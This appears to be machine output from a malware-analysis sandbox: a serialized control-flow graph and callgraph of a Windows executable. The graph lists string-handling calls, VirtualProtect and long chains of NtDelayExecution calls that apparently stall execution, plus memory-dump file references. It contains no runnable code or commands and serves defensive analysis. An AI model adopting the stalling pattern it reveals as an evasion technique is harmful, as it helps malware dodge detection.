140006650 2087->2089 2088->2085 2088->2086 2089->2085 2230 14000219e 2231 140002272 2230->2231 2232 1400021ab EnterCriticalSection 2230->2232 2233 140002265 LeaveCriticalSection 2232->2233 2235 1400021c8 2232->2235 2233->2231 2234 1400021e9 TlsGetValue GetLastError 2234->2235 2235->2233 2235->2234 2124 140001800 2125 140001812 2124->2125 2126 140001835 fprintf 2125->2126 2127 140001000 2128 14000108b __set_app_type 2127->2128 2129 140001040 2127->2129 2131 1400010b6 2128->2131 2129->2128 2130 1400010e5 2131->2130 2133 140001e00 2131->2133 2134 140006ac0 __setusermatherr 2133->2134 2236 140002320 strlen 2237 140002337 2236->2237 2246 140001140 2249 140001160 2246->2249 2248 140001156 2250 1400011b9 2249->2250 2251 14000118b 2249->2251 2252 1400011d3 2250->2252 2253 1400011c7 _amsg_exit 2250->2253 2251->2250 2254 1400011a0 Sleep 2251->2254 2255 140001201 _initterm 2252->2255 2256 14000121a 2252->2256 2253->2252 2254->2250 2254->2251 2255->2256 2272 140001880 2256->2272 2259 14000126a 2260 14000126f malloc 2259->2260 2261 14000128b 2260->2261 2263 1400012d0 2260->2263 2262 1400012a0 strlen malloc memcpy 2261->2262 2262->2262 2262->2263 2283 140003240 2263->2283 2265 140001315 2266 140001344 2265->2266 2267 140001324 2265->2267 2270 140001160 76 API calls 2266->2270 2268 140001338 2267->2268 2269 14000132d _cexit 2267->2269 2268->2248 2269->2268 2271 140001366 2270->2271 2271->2248 2273 140001247 SetUnhandledExceptionFilter 2272->2273 2274 1400018a2 2272->2274 2273->2259 2274->2273 2278 14000194d 2274->2278 2279 140001a20 2274->2279 2275 140001ba0 4 API calls 2275->2278 2276 14000199e 2276->2273 2277 1400019e9 VirtualProtect 2276->2277 2277->2276 2278->2275 2278->2276 2279->2276 2280 140001b36 2279->2280 2282 140001b53 2279->2282 2281 140001ba0 4 API calls 2280->2281 2281->2282 2286 140003256 2283->2286 2284 14000336c wcslen 2393 14000153f 2284->2393 2286->2284 2288 14000356e 2288->2265 2291 140003467 2294 14000348d memset 2291->2294 2296 1400034bf 2294->2296 2297 14000350f wcslen 2296->2297 2298 140003525 2297->2298 2302 14000356c 2297->2302 2299 140003540 _wcsnicmp 2298->2299 2300 140003556 wcslen 2299->2300 2299->2302 2300->2299 2300->2302 2301 140003631 wcscpy wcscat memset 2304 140003670 2301->2304 2302->2301 2303 1400036b3 wcscpy wcscat memset 2305 1400036f6 2303->2305 2304->2303 2306 1400037fe wcscpy wcscat memset 2305->2306 2307 140003840 2306->2307 2308 140003b8d wcslen 2307->2308 2309 140003b9b 2308->2309 2313 140003bcb 2308->2313 2310 140003ba0 _wcsnicmp 2309->2310 2311 140003bb6 wcslen 2310->2311 2310->2313 2311->2310 2311->2313 2312 140003c2c wcscpy wcscat memset 2315 140003c6e 2312->2315 2313->2312 2314 140003cb1 wcscpy wcscat memset 2317 140003cf7 2314->2317 2315->2314 2316 140003d27 wcscpy wcscat 2318 1400060a5 memcpy 2316->2318 2320 140003d59 2316->2320 2317->2316 2318->2320 2319 140003eac wcslen 2322 140003ef1 2319->2322 2320->2319 2321 140003f56 wcslen memset 2533 14000157b 2321->2533 2322->2321 2324 1400045bf memset 2325 1400045ee 2324->2325 2326 140004633 wcscpy wcscat wcslen 2325->2326 2574 14000146d 2326->2574 2330 1400045a9 2331 14000145e 2 API calls 2330->2331 2334 1400045a4 2331->2334 2332 1400047d3 2339 140004812 memset 2332->2339 2333 14000157b 2 API calls 2365 14000407f 2333->2365 2334->2324 2337 140004743 2660 1400014a9 2337->2660 2338 1400047ef 2344 14000145e 2 API calls 2338->2344 2342 140006186 2339->2342 2343 140004836 wcscpy wcscat wcslen 2339->2343 2384 140004960 2343->2384 2344->2332 2347 1400047df 2352 14000145e 2 API calls 2347->2352 2348 14000145e 2 API calls 2348->2365 2350 1400043d4 _wcsnicmp 2354 14000458c 2350->2354 2350->2365 2352->2332 2355 14000145e 2 API calls 2354->2355 2357 140004598 2355->2357 2356 1400047c7 2358 14000145e 2 API calls 2356->2358 2361 14000145e 2 API calls 2357->2361 2358->2332 2359 140004432 _wcsnicmp 2359->2354 2359->2365 2360 140004a59 wcslen 2362 14000153f 2 API calls 2360->2362 2361->2334 2362->2384 2363 140005caf memcpy 2363->2384 2364 140004486 _wcsnicmp 2364->2354 2364->2365 2365->2324 2365->2330 2365->2333 2365->2348 2365->2350 2365->2359 2365->2364 2366 140004257 wcsstr 2365->2366 2550 140001599 2365->2550 2563 1400015a8 2365->2563 2366->2354 2366->2365 2367 140004bcd wcslen 2368 14000153f 2 API calls 2367->2368 2368->2384 2369 14000501d wcslen 2371 14000153f 2 API calls 2369->2371 2370 140004db2 wcslen 2372 14000157b 2 API calls 2370->2372 2371->2384 2372->2384 2373 140004e35 memset 2373->2384 2374 140005941 wcscpy wcscat wcslen 2376 140001422 2 API calls 2374->2376 2375 140005e80 memcpy 2375->2384 2376->2384 2377 140004e9f wcslen 2378 1400015a8 2 API calls 2377->2378 2378->2384 2381 140004f07 _wcsnicmp 2381->2384 2382 140005a8c 2382->2265 2383 140005b37 wcslen 2385 1400015a8 2 API calls 2383->2385 2384->2360 2384->2363 2384->2367 2384->2369 2384->2370 2384->2373 2384->2374 2384->2375 2384->2377 2384->2381 2384->2382 2384->2383 2386 1400056dd memset 2384->2386 2387 1400058e0 memset 2384->2387 2388 1400027d0 11 API calls 2384->2388 2389 14000574b memset 2384->2389 2390 1400057a5 wcscpy wcscat wcslen 2384->2390 2392 14000145e NtDelayExecution malloc 2384->2392 2776 1400014d6 2384->2776 2821 140001521 2384->2821 2919 140001431 2384->2919 2385->2384 2386->2384 2386->2387 2387->2384 2388->2384 2389->2384 2850 140001422 2390->2850 2392->2384 2394 140001394 2 API calls 2393->2394 2395 14000154e 2394->2395 2396 140001394 2 API calls 2395->2396 2397 14000155d 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000156c 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000157b 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000158a 2402->2403 2404 140001394 2 API calls 2403->2404 2405 140001599 2404->2405 2406 140001394 2 API calls 2405->2406 2407 1400015a8 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015b7 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015c6 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015d5 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015e4 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015f3 2416->2417 2417->2288 2418 140001503 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000150d 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001512 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001521 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001530 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000153f 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000154e 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000155d 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000156c 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000157b 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000158a 2437->2438 2439 140001394 2 API calls 2438->2439 2440 140001599 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015a8 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015b7 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015c6 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015d5 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015e4 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015f3 2451->2452 2452->2291 2453 14000156c 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000157b 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000158a 2456->2457 2458 140001394 2 API calls 2457->2458 2459 140001599 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015a8 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015b7 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015c6 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015d5 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015e4 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015f3 2470->2471 2471->2291 2472 14000145e 2471->2472 2473 140001394 2 API calls 2472->2473 2474 14000146d 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000147c 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000148b 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000149a 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014a9 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014b8 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014c7 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014d6 2487->2488 2489 1400014e5 2488->2489 2490 140001394 2 API calls 2488->2490 2491 140001394 2 API calls 2489->2491 2490->2489 2492 1400014ef 2491->2492 2493 1400014f4 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014fe 2495->2496 2497 140001503 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 14000150d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 140001512 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001521 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001530 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000153f 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000154e 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000155d 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000156c 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000157b 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000158a 2517->2518 2519 140001394 2 API calls 2518->2519 2520 140001599 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015a8 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015b7 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015c6 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015d5 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015e4 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015f3 2531->2532 2532->2291 2534 140001394 2 API calls 2533->2534 2535 14000158a 2534->2535 2536 140001394 2 API calls 2535->2536 2537 140001599 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400015a8 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015b7 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015c6 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015d5 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015e4 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015f3 2548->2549 2549->2365 2551 140001394 2 API calls 2550->2551 2552 1400015a8 2551->2552 2553 140001394 2 API calls 2552->2553 2554 1400015b7 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015c6 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015d5 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015e4 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015f3 2561->2562 2562->2365 2564 140001394 2 API calls 2563->2564 2565 1400015b7 2564->2565 2566 140001394 2 API calls 2565->2566 2567 1400015c6 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015d5 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015e4 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015f3 2572->2573 2573->2365 2575 140001394 2 API calls 2574->2575 2576 14000147c 2575->2576 2577 140001394 2 API calls 2576->2577 2578 14000148b 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000149a 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400014a9 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014b8 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014c7 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014d6 2587->2588 2589 1400014e5 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014ef 2591->2592 2593 1400014f4 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014fe 2595->2596 2597 140001503 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 14000150d 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001512 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001521 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001530 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000153f 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000154e 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000155d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000156c 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000157b 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000158a 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001599 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015a8 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015b7 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015c6 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015d5 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015e4 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015f3 2631->2632 2632->2332 2633 140001530 2632->2633 2634 140001394 2 API calls 2633->2634 2635 14000153f 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000154e 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000155d 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000156c 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000157b 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000158a 2644->2645 2646 140001394 2 API calls 2645->2646 2647 140001599 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015a8 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2337 2659->2338 2661 140001394 2 API calls 2660->2661 2662 1400014b8 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400014c7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014d6 2665->2666 2667 1400014e5 2666->2667 2668 140001394 2 API calls 2666->2668 2669 140001394 2 API calls 2667->2669 2668->2667 2670 1400014ef 2669->2670 2671 1400014f4 2670->2671 2672 140001394 2 API calls 2670->2672 2673 140001394 2 API calls 2671->2673 2672->2671 2674 1400014fe 2673->2674 2675 140001503 2674->2675 2676 140001394 2 API calls 2674->2676 2677 140001394 2 API calls 2675->2677 2676->2675 2678 14000150d 2677->2678 2679 140001394 2 API calls 2678->2679 2680 140001512 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001521 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001530 2683->2684 2685 140001394 2 API calls 2684->2685 2686 14000153f 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000154e 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000155d 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000156c 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000157b 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000158a 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001599 2697->2698 2699 140001394 2 API calls 2698->2699 2700 1400015a8 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015b7 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015c6 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015d5 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015e4 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015f3 2709->2710 2710->2347 2711 140001440 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000144f 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000145e 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000146d 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000147c 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000148b 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000149a 2722->2723 2724 140001394 2 API calls 2723->2724 2725 1400014a9 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014b8 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014c7 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014d6 2730->2731 2732 1400014e5 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 2733->2732 2735 1400014ef 2734->2735 2736 1400014f4 2735->2736 2737 140001394 2 API calls 2735->2737 2738 140001394 2 API calls 2736->2738 2737->2736 2739 1400014fe 2738->2739 2740 140001503 2739->2740 2741 140001394 2 API calls 2739->2741 2742 140001394 2 API calls 2740->2742 2741->2740 2743 14000150d 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001512 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001521 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001530 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000153f 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000154e 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000155d 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000156c 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000157b 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000158a 2760->2761 2762 140001394 2 API calls 2761->2762 2763 140001599 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015a8 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015b7 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015c6 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015d5 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015e4 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015f3 2774->2775 2775->2347 2775->2356 2777 1400014e5 2776->2777 2778 140001394 2 API calls 2776->2778 2779 140001394 2 API calls 2777->2779 2778->2777 2780 1400014ef 2779->2780 2781 1400014f4 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014fe 2783->2784 2785 140001503 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 14000150d 2787->2788 2789 140001394 2 API calls 2788->2789 2790 140001512 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001521 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001530 2793->2794 2795 140001394 2 API calls 2794->2795 2796 14000153f 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000154e 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000155d 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000156c 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000157b 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000158a 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001599 2807->2808 2809 140001394 2 API calls 2808->2809 2810 1400015a8 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015b7 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015c6 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015d5 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015e4 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015f3 2819->2820 2820->2384 2822 140001394 2 API calls 2821->2822 2823 140001530 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000153f 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000154e 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000155d 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000156c 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000157b 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000158a 2834->2835 2836 140001394 2 API calls 2835->2836 2837 140001599 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015a8 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015b7 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015c6 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015d5 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015e4 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015f3 2848->2849 2849->2384 2851 140001394 2 API calls 2850->2851 2852 140001431 2851->2852 2853 140001394 2 API calls 2852->2853 2854 140001440 2853->2854 2855 140001394 2 API calls 2854->2855 2856 14000144f 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000145e 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000146d 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000147c 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000148b 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000149a 2865->2866 2867 140001394 2 API calls 2866->2867 2868 1400014a9 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014b8 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014c7 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014d6 2873->2874 2875 1400014e5 2874->2875 2876 140001394 2 API calls 2874->2876 2877 140001394 2 API calls 2875->2877 2876->2875 2878 1400014ef 2877->2878 2879 1400014f4 2878->2879 2880 140001394 2 API calls 2878->2880 2881 140001394 2 API calls 2879->2881 2880->2879 2882 1400014fe 2881->2882 2883 140001503 2882->2883 2884 140001394 2 API calls 2882->2884 2885 140001394 2 API calls 2883->2885 2884->2883 2886 14000150d 2885->2886 2887 140001394 2 API calls 2886->2887 2888 140001512 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001521 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001530 2891->2892 2893 140001394 2 API calls 2892->2893 2894 14000153f 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000154e 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000155d 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2384 2920 140001394 2 API calls 2919->2920 2921 140001440 2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2384

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph 0 Function_00000001400026E1 1 Function_00000001400031E1 2 Function_00000001400062E1 3 Function_0000000140001AE4 37 Function_0000000140001D40 3->37 79 Function_0000000140001BA0 3->79 4 Function_00000001400014E5 75 Function_0000000140001394 4->75 5 Function_0000000140002FF0 61 Function_0000000140001370 5->61 6 Function_00000001400010F0 7 Function_00000001400064F0 8 Function_00000001400061F1 9 Function_00000001400014F4 9->75 10 Function_0000000140002500 11 Function_0000000140003200 12 Function_0000000140001800 69 Function_0000000140002290 12->69 13 Function_0000000140001E00 14 Function_0000000140001000 14->13 43 Function_0000000140001750 14->43 87 Function_0000000140001FB0 14->87 93 Function_0000000140001FC0 14->93 15 Function_0000000140006301 16 Function_0000000140001503 16->75 17 Function_0000000140001404 17->75 18 Function_0000000140002104 19 Function_0000000140006510 20 Function_0000000140001E10 21 Function_0000000140006310 22 Function_0000000140006211 23 Function_0000000140001512 23->75 24 Function_0000000140003220 25 Function_0000000140002320 26 Function_0000000140002420 27 Function_0000000140006520 27->19 28 Function_0000000140001521 28->75 29 Function_0000000140001422 29->75 30 Function_0000000140001530 30->75 31 Function_0000000140001431 31->75 32 Function_0000000140006331 33 Function_0000000140006231 34 Function_000000014000153F 34->75 35 Function_0000000140001440 35->75 36 Function_0000000140001140 50 Function_0000000140001160 36->50 37->69 38 Function_0000000140003240 38->5 38->16 38->19 38->28 38->29 38->30 38->31 38->34 38->35 48 Function_000000014000145E 38->48 51 Function_0000000140002660 38->51 57 Function_000000014000156C 38->57 58 Function_000000014000146D 38->58 38->61 64 Function_000000014000157B 38->64 77 Function_0000000140001599 38->77 84 Function_00000001400015A8 38->84 85 Function_00000001400014A9 38->85 92 Function_00000001400016C0 38->92 102 Function_00000001400027D0 38->102 106 Function_00000001400014D6 38->106 39 Function_0000000140006441 40 Function_0000000140003141 41 Function_0000000140001F47 60 Function_0000000140001870 41->60 42 Function_0000000140002050 44 Function_0000000140001650 45 Function_0000000140002751 46 Function_0000000140006251 47 Function_000000014000155D 47->75 48->75 49 Function_0000000140001760 107 Function_00000001400020E0 49->107 50->38 50->50 50->60 65 Function_0000000140001880 50->65 68 Function_0000000140001F90 50->68 50->92 52 Function_0000000140002460 53 Function_0000000140003160 54 Function_0000000140006361 55 Function_0000000140006461 56 Function_0000000140001E65 56->60 57->75 58->75 59 Function_000000014000216F 62 Function_0000000140001A70 62->37 62->79 63 Function_0000000140002770 64->75 65->26 65->37 65->51 65->79 66 Function_0000000140003180 67 Function_0000000140006281 70 Function_0000000140002590 71 Function_0000000140002790 72 Function_0000000140002691 73 Function_0000000140006391 74 Function_0000000140006491 75->27 101 Function_00000001400067D0 75->101 76 Function_0000000140002194 76->60 77->75 78 Function_000000014000219E 79->37 86 Function_00000001400023B0 79->86 100 Function_00000001400024D0 79->100 80 Function_0000000140001FA0 81 Function_00000001400027A0 82 Function_00000001400031A1 83 Function_00000001400062A1 84->75 85->75 88 Function_00000001400022B0 89 Function_00000001400026B0 90 Function_00000001400027B1 91 Function_0000000140001AB3 91->37 91->79 94 Function_00000001400061C1 95 Function_00000001400062C1 96 Function_0000000140001AC3 96->37 96->79 97 Function_00000001400014C7 97->75 98 Function_00000001400026D0 99 Function_0000000140001FD0 101->19 102->4 102->9 102->16 102->19 102->23 102->47 102->48 102->51 102->61 102->85 102->97 103 Function_00000001400017D0 104 Function_00000001400063D1 105 Function_0000000140001AD4 105->37 105->79 106->75 108 Function_00000001400017E0 108->107 109 Function_00000001400022E0

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • NtDelayExecution.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
